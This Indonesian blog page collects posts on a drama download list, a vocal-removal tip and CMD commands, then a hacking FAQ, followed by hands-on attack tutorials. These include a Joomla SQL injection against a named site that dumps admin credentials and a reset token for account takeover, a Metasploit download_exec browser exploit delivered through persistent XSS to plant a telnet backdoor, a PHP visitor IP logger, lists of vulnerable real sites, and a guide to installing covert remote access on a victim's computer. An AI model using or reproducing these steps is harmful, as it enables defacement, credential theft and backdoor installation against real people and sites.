Hi, guest | Welcome to Blog Serba Guna | Register | Sign in
Advertise | Contact | About | Live Music | Donation | Sitemap

Kamis, 29 Maret 2012

Download Film City Hunter Bahasa Indonesia Episode 1 - 20 - Drama Korea

. Kamis, 29 Maret 2012
2 komentar

Kalian para pecinta film korea nih film City Hunter dari episode 1 - 20, link download via indowebster, oke langsung saja Download Film Cty Hunter Bahasa Indonesia Episode 1 - 20 di bawah:

Episode 1 | Download
Episode 2 | Download
Episode 3 | Download 
Episode 4 | Dowbload 
Episode 5 | Download 
Episode 6 | Download 
Episode 7 | Download 
Episode 8 | Download 
Episode 9 | Download 
Episode 10 | Download 
Episode 11 | Download 
Episode 12 | Download 
Episode 13 | Download 
Episode 14 | Download 
Episode 15 | Download 
Episode 16 | Download 
Episode 17 | Download 
Episode 18 | Download 
Episode 19 | Download 
Episode 20 | Download

selengkapnya->

Cara Menghilangkan Suara Vokal Lagu/Audio

.
0 komentar


Anda ingin karaoke namun lagu tidak bisa dihilangkan vokalnya?? Coba trik ini. Yang anda butuhkan hanya adobe audition, bisa di download DISINI. Masukkan dulu file anda ke workspace, kemudian pilih tab effects - filter - center channel extractor.

Tidak seperti vocal remover yang lain, adobe audition HANYA akan membuang vokal tengah saja (center channel) sehingga channel kiri dan kanan tidak terpengaruh. Jadi lagu anda tetap pada dual channel (stereo).

vocal remove

Disana ada beberapa pilihan, anda bisa pilih karaoke untuk menyisakan sedikit vokal utama atau pilih vocal remove untuk menghilangkan seluruh vokal utama. Atur sesuai keinginan hingga didapat hasil yang diinginkan (tekan preview untuk mendengar efek secara realtime) Terlalu tinggi settingannya akan membuat suara menjadi jelek (efek robot) jadi sesuaikan dengan lagu anda. Setelah didapat settingan yang optimum, tekan OK.

Catatan:
Lagu yang akan di remove harus memiliki kualitas tinggi (min. 128 kbps) supaya hasil efek lebih bagus. 
 
courtesy.yasiranak252
selengkapnya->

CMD SYNTAX for newbie...

.
0 komentar

ASSOC =Menampilkan atau mengubah asosiasi ekstensi file.
AT= Menjadwalkan perintah dan program agar berjalan di komputer.
ATTRIB= Menampilkan atau mengubah atribut file.
BREAK= Mengeset atau menghilangkan pengecekan extended CTRL+C.
CACLS= Menampilkan atau mengubah access control lists (ACLs) dai files.
CALL =Memanggil sebuah program batch dari program batch yang lain.
CD =Menampilkan nama atau mengubah direktori sekarang.
CHCP =Menampilkan atau mengubah active code page number.
CHDIR =Menampilkan nama atau mengubah direktori sekarang.
CHKDSK =Memeriksa sebuah disket/harddisk dan menampilkan laporan status..
CHKNTFS =Menampilkan atau mengubah pemeriksaan disket pada saat booting.
CLS =Menghapus layar..
CMD =Menjalankan interpreter command Windows yang baru.
COLOR =Mengubah warna foreground dan background pada command prompt.
COMP =Membandingkan isi dari dua atau beberapa file.
COMPACT =Menampilkan atau mengubah kompresi file pada partisi NTFS.
CONVERT =Mengkonversi FAT ke NTFS. Anda tidak dapat mengkonversi drive yang sedang aktif.
COPY =Menyalin satu atau beberapa file ke lokasi lain.
DATE= Menampilkan atau mengubah tanggal.
DEL= Menghapus satu atau beberapa file.
DIR =Menampilkan daftar file dan subdirektori dalam sebuah direktori.
DISKCOMP= Membandingkan isi dari dua buah disket.
DISKCOPY =Menyalin isi dari satu disket ke disket lain.
DOSKEY= Mngedit baris perintah, memanggil kembali perintah Windows, dan membuat macro.
ECHO =Menampilkan pesan, atau mengubah command echoing on atau off.
ENDLOCAL =Mengakhiri localization dari environment changes in a batch file.
ERASE =Menghapus satu atau beberapa fie.
EXIT =Keluar dari program CMD.EXE.
FC =Membandingkan 2 atau beberapa file, dan Menampilkan perbedaan file-file tersebut.
FIND =Mencari string teks dalam sebuah file atau beberapa file.
FINDSTR =Mencari string dalam file.
FOR =Menjalankan perintah yang spesifik untuk masing-masing file dalam sekumpulan file.
FORMAT =Mem-Formats sebuah hardisk/disket untuk digunakan dalam Windows.
FTYPE =Menampilkan atau mengubah tipe file yang digunakan dalam asosiasi ekstensi file.
GOTO =Mengarahkan Windows command interpreter ke baris yang berlabel dalam sebuah program batch.
GRAFTABL= Membolehkan Windows untuk menampilkan sekumpulan karakter extended dalam mode grafik.
HELP= Menyediakan informasi Help untuk perintah-perintah Windows.
IF =Menjalankan proses kondisi dalam program batch.
LABEL =Membuat, mengubah, atau menghapus volume label dari sebuah disket/harddisk.
MD =Membuat direktori.
MKDIR =Membuat direktori.
MODE =Mengkonfigurasi system device.
MORE =Menampilkan hasil perlayar..
MOVE =Memindahkan satu atau beberapa file dari satu direktori ke direktori yang lain.
PATH =Menampilkan ata mengeset search path untuk executable files.
PAUSE =Menunda pemrosesan dari sebuah batch file dan Menampilkan pesan.
POPD= Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSH.
PRINT =Mencetak file teks.
PROMPT= Mengubah command prompt Windows.
PUSHD =Menyimpan direktori sekarang kemudian mengubahnya.
RD =Menghapus direktori.
RECOVER =Mengembalikan informasi yang masih dapat dibaca dari sebuah disket/harddisk yang sudah bad/rusak.
REM =Merekam kemontar dalam batch files atau CONFIG.SYS.
REN= Mengubah nama file.
RENAME =Mengubah nama file.
REPLACE =Menggantikan file.
RMDIR =Menghapus direktori.
SET =Menampilkan, mengatur, atau menghapus Windows environment variables.
SETLOCAL =Memulai localization dari environment changes dalam sebuah batch file.
SHIFT= Menggeser posisi parameters yang replacable dalam batch files.
SORT= Mensortir input.
START =Memulai jendela terpisah untuk menjalankan perintah atau program spesifik.
SUBST =Meng-asosiasikan sebuah path dengan drive letter.
TIME =Menampilkan atau mengatur waktu sistem.
TITLE =Mengatur judul jendela untuk sesi CMD.EXE.
TREE =Menampilkan secara grafis struktur direktori dari sebuah drivve atau path.
TYPE =Menampilkan isi dari sebuah file eks.
VER =Menampilkan versi windows.
VERIFY =memberitahu Windows untuk mem-verifikasi file anda telah disimpan secara benar dalam harddisk/disket.
VOL =Menampilkan nomor serial dan volume label dari sebuah harddisk/disket
XCOPY= Menyalin file dan pohon direktori.

dapet copy paste tuh..cz yang asli pake b.ing...hehe
kalo masih bngung artiin ja yg b.ingnya di cmd dgn
selengkapnya->

Bagaimana Cara Menjadi Hacker?

.
0 komentar





-----

Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com

courtesy.xcode
selengkapnya->

Teknik Remote by email

.
0 komentar


Assalamualaikum saya kali ini mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini jangan takut karna exploit ini masih bisa di gunakan sampai sekarang :) toturial ini sangat simple dan totur ini sering saya pakai untuk deface website dengan exploit yang 1 ini
ok tanpa basa basi aja ya :) sekarang buka google dan ketik dork di atas
Dork : inurl:”option com_artforms” bisa juga menggunakan dengan mirc :D bagi yang tau ya saya di sini suka manual karna saya jarang main mirc :D
Ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/
target : http://www.avaclean.com/
dan sekarang kita buka web target tadi
Contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi dengan contoh seperti ini :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users–
dan hasil nya akan seperti ini
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P
dan sekarang kita coba open tab untuk mereset password nya
contoh :
http://www.avaclean.com//index.php?option=com_user&view=reset
dan sekarang masukan email tersebut
josh@bkmediagroup.com
ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4
contoh :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users–
dan hasil nya akan menjadi seperti ini
admineda7d6142fac40a533b56407a4617371
ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371   <== yang mana code token nya ?? ok sekarang saya jelas kan
code : [admin]eda7d6142fac40a533b56407a4617371
yang saya kasih dalam tanda kurung itu adalah user nya
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371
dan itu adalah token nya :) ok binggo sekarang user sudah ke reset tinggal masukan password baru aja :D
selamat sekarang anda menjadi admin
untuk joomla login ada biasa nya
contoh login admin : http://localhost/administrator
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi :)
# Update
untuk code token sekarang kalau untuk manual kebanyakan biasa nya memakai tanda $$$ contoh token yang tidak bisa di reset seperti ini
:admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$
dan bila kalian menemukan bagian seperti ada tanda $1$c8b6c03c$ tidak bisa di reset password
Ok sekian dulu toturial dari saya salam selalu .
Mohon maaf bila ada salah yang saya berikan ini :) assalamualaikum :)
Thanks to : p4km1n -=- SikodoQ -=- Unix -=- Billgates -=- Raka MBT -=- Om-Jin -=- All member KCH | MBT | Anonymousteam Defacer Indonesia |

Memanfaatkan celah XSS Persistent pada suatu web untuk menyebarkan backdoor telnet ke para pengunjung web

Sebelum membaca tutorial bagi yang belum mengetahui XSS Persistent maka disarankan anda masuk ke http://blog.xcode.or.id/?p=983 untuk lebih memahami XSS Persistent.
Pertama-tama anda dapat membuat sebuah file dengan nama web.php
web.ph<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<title>Error page</title>
</HEAD>
<BODY>
<?php
$ipaddress = $_SERVER['REMOTE_ADDR'];
$referrer = getenv(‘HTTP_REFERER’);
$simpandate = date(“d-m-y / H:i:s”);
$userAgent = getenv(‘HTTP_USER_AGENT’);
$invoegen = $simpandate . ”
<br/><b>IP :</b> ” . $ipaddress . ”
<br/> <b>From :</b> <a href=’” . $referrer . “‘>” . $referrer . “</a>
<br/><b>Browser :</b> ” . $userAgent .”
<br />========================================<br/>”;
$fopen = fopen(“daftar_ip.html”, “a”);
fwrite($fopen, $invoegen);
fclose($fopen);
?>
<script type=’text/javascript’>
window.location.href=”http://(ip komputer anda)/”;
</script>
</BODY>
</HTML>
Lalu buat file kosong dengan nama daftar_ip.html.
Kita siapkan Metasploit Framework, disini ada berbagai exploitasi browser dan aplikasi-aplikasi yang dapat berintegrasi dengan browser misal Adobe Acrobat.
Disini penulis contohkan untuk IE 7.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 718 exploits – 361 auxiliary – 68 post
+ — –=[ 226 payloads – 27 encoders – 8 nops
=[ svn r13462 updated 229 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 229 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use exploit/windows/browser/ms09_002_memory_corruption
msf  exploit(ms09_002_memory_corruption) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf  exploit(ms09_002_memory_corruption) > set SRVPORT 80
msf  exploit(ms09_002_memory_corruption) > set URL http://(domain  anda tempat meletakkan file telnet)/telnet2.exe
SRVPORT => 80
URL => http://(domain  anda tempat meletakkan file telnet)/telnet2.exe
msf  exploit(ms09_002_memory_corruption) > set URIPATH /
URIPATH => /
msf  exploit(ms09_002_memory_corruption) > exploit
Setelah memasukkan perintah-perintah diatas maka komputer anda sudah siap untuk menerima kunjungan dari browser korban.
Karena kita menggunakan backdoor telnet maka target juga harus memiliki IP Publik dan berhubungan langsung dengan komputernya misalnya dia menggunakan Indos*t M2, atau Telk*m Fl*sh. Jika target anda tidak mempunyai IP Publik yang berhubungan langsung dengan komputernya maka anda dapat menggunakan backdoor lain yang sifatnya komputer korban memanggil komputer penyerang yang konsepnya sama dengan Connect Back.
Skenario
Pada target yang memilih celah XSS Persistent dapat dimasukkan <script>document.location=’http://(web anda)/web.php’;</script>
Ketika sudah disimpan oleh web dan korban membuka web tersebut maka korban dari website yang dia buka akan menjalankan web.php dan terekam ip komputer korban, dari situ browser akan diarahkan untuk membuka exploit di komputer attacker.  Saat exploit bekerja dengan baik maka korban akan mendownload otomatis file telnet2.exe dan dijalankan.
Saat komputer korban menjalankan file telnet2.exe maka kita dapat melihat daftar IP ( daftar_ip.html ) yang terekam tadi tinggal kita masuk ke komputer korban dengan perintah telnet (ip korban) 5000. Mengapa port 5000? karena file telnet2.exe membuka pada port 5000.
Download : http://xcode.or.id/telnetbackdoor.rar
*Program ini terdeteksi sebagai malware oleh AV
Password : yogyafree
Oleh Kurniawan – yk_family_code@yahoo.com

XSS Persistent untuk deface halaman web

Berjumpa lagi dengan saya Mas Kurniawan.  Sebelumnya penulis telah membahas tentang XSS, untuk review k ebelakang penulis akan membahasnya kembali bahwa XSS adalah salah satu serangan injeksi code (kode html) yang dimana sebelumnya di blog ini yang dibahas adalah yang sifatnya reflected atau non persistent yang disitu kode HTML tidak tersimpan di web server.
Teknik XSS (Cross Site Scripting) untuk mendapatkan shell target si pembuka URL
http://blog.xcode.or.id/?p=634
Juga di http://blog.xcode.or.id/?p=883 dibahas dari scanning XSS dan exploitasinya.
Disini penulis akan membahas tentang XSS stored atau Persistent yang dapat berpengaruh pada semua klien yang masuk ke halaman web tersebut karena inputan HTML kita akan disimpan didalam web server.
Contohnya target kita adalah CMS Max Guestbook, CMS ini tidak ada databasenya, hasil rekaman disimpan di web server.
Disini penulis mencoba melakukan inputan pada “Name”, disini inputannya adalah :
<script>alert('Kurniawan memang ganteng')</script>
Seperti dibawah ini :



















Hasilnya adalah











Ketika pengunjung lain masuk ke buku tamu tersebut maka pesan alert “Kurniawan memang ganteng” tetap muncul karena inputan HTML yang penulis lakukan tersimpan dalam web server.
Sekarang kita coba dengan
<script>document.location=’http://xcode.or.id/sample.html’;</script>













Maka hasilnya buku tamu akan melakukan redirect ke http://xcode.or.id/sample.html
Dengan demikian maka kesimpulannya adalah XSS stored atau Persistent mempunyai efek serangan yang lebih besar dibandingkan dengan XSS sifatnya reflected atau non persistent.
Oleh Kurniawan – yk_family_code@yahoo.com

Counter-Strike 1.6 No Steam Crash Exploit


=========================================
Counter-Strike 1.6 No Steam Crash Exploit
=========================================
:————————————————————————————————————————————————————:
: # Exploit Title : Counter-Strike 1.6 No Steam Crash Exploit
: # Date : March 4th 2012
: # Author : X-Cisadane
: # Software Link : http://blog.counter-strike.net/
: # Version : 1.6
: # Category : Desktop (Windows) Applications
: # Platform : Win32
: # Vulnerability : Crash Exploit
: # Tested On : Windows XP Professional Service Pack 3
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————————————————:
Proof Of Concept
================
[ENGLISH]
1.This my default Counter-Strike No Steam installation directory : C:\Program Files\Counter-Strike 1.6\
2.Open default Counter-Strike No Steam installation directory and open the directory named cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Find & Open motd.txt and replace the contents with this code :
HTML BODY IFRAME src=”file://þ:/filename” /BODY /HTML
4.Save!
5.Run Counter-Strike 1.6 No Steam
- Create a new game, Choose the map & set the gameplay.
- Start your game! Waiting until map loaded & the motd show
- And Counter-Strike 1.6 No Steam Forcibly Closed (Crash).
[INDONESIAN]
1.Ini direktori saya tempat menginstall Counter-Strike No Steam : C:\Program Files\Counter-Strike 1.6\
2.Buka direktori tempat menginstall Counter-Strike No Steam dan buka direktori bernama cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Temukan dan buka file motd.txt dan ganti isi file tersebut dengan koding di bawah ini :
iframe src=”file://þ:/filename” width=”320″ height=”240″ /iframe
4.Simpan!
5.Jalankan Counter-Strike 1.6 No Steam
- Buat sebuah Server, Pilih map dan atur permainan.
- Mulailah permainan! Tunggu hingga progress bar selesai dan map berhasil dimuat serta motdnya muncul.
- Dan secara paksa Counter-Strike 1.6 No Steam akan tertutup.
NB : Exploit ini bisa dikembangkan, monggo bagi yang dah master silahkan dicoba-coba

CnnCMS 1.x SQL Injection Vulnerability

:————————————————————————————————————————-:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : Darkzzzz a.k.a X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : XCode-Yogyafree, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————-:
SQL Injection Vulnerability :
- Open Victim Website : http:////sub_menu.php?sid=-[SQL]
Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : http:////admin/

Tutorial penggunaan Remote By Mail

Penulis : j0ck3r » Sun Feb 26, 2012
Remote By Mail buatan http://www.runtime.org/ Meskipun namanya Remote tapi software ini bukanlah Trojan,saya lebih suka menyebutnya sebagai software remote access,akan tetapi tehnik yang digunakan cukup unik yaitu menggunakan media e-mail.,suatu tehnik yang unik dan bisa melewati proteksi yang dilakukan oleh Firewall.Tetapi ( ada tapinya lhoo…) kita tidak bisa melakukan instalasi jarak jauh seperti trojan yang bisa di binded dengan software lain.Kita haru duduk didepan komputer korban dan melakukan installasi manual dan setting manual.Yuk kita mulai belajar menggunakan software ini
Pertama-tama,setelah download filenya kita lakukan installasi dulu,jadi gak perlu saya jelaskan disini,tentunya semuanya bisa melakukan installasi. Downloadnya disini
setelah selesai lalu kita jalankan softwarenya dan pilih tools lalu pilih account,disini kita isi dengan alamat e-mail dimana software ini secara berkala akan melakukan check di inbox e-mail yang udah kita tentukan.urutanya kaya gini:
Account name: Diisi bebas
From Name: Di isi Bebas
From E-mail: Di isi alamat e-mail tempat perintah dikirimkan
POP Server : Alamat POP e-mail tempat perintah,disini saya pake e-mail dari drivehq jadi alamat POP nya adalah mail.drivehq.com
POP User : Di isi username POP
POP Password: Di isi Password login POP
SMTP: : Di isi alamat SMTP E-mail
Authentication : Pilih aja same as POP
Delete Message: Menentukan tiap berapa hari e-mail di software ini dihapus
Kolom Access: Menentukan dari domain e-mail mana perintah yang akan dilakukan. Misal kita pakai gmail maka di isi *@gmail.com
Available Commands: Default perintah yang ada,kita bisa ,menambahkan daftar perintah disana
Password: Menentukan Pasword,karena sekarang memalsukan e-mail kan mudah,maka diperlukan password agar software ini melakukan verifikasi perintah dari “tuannya”
Default Reply Subject: Diisi bebas
kalau udah klik OK. kaya gambar dibawah
Nb: Bila ada yang belum tahu alamat POP dan SMTP e-mail yang digunakan,bisa ditanyakan ke penyedia layanan e-mail yang digunakan.

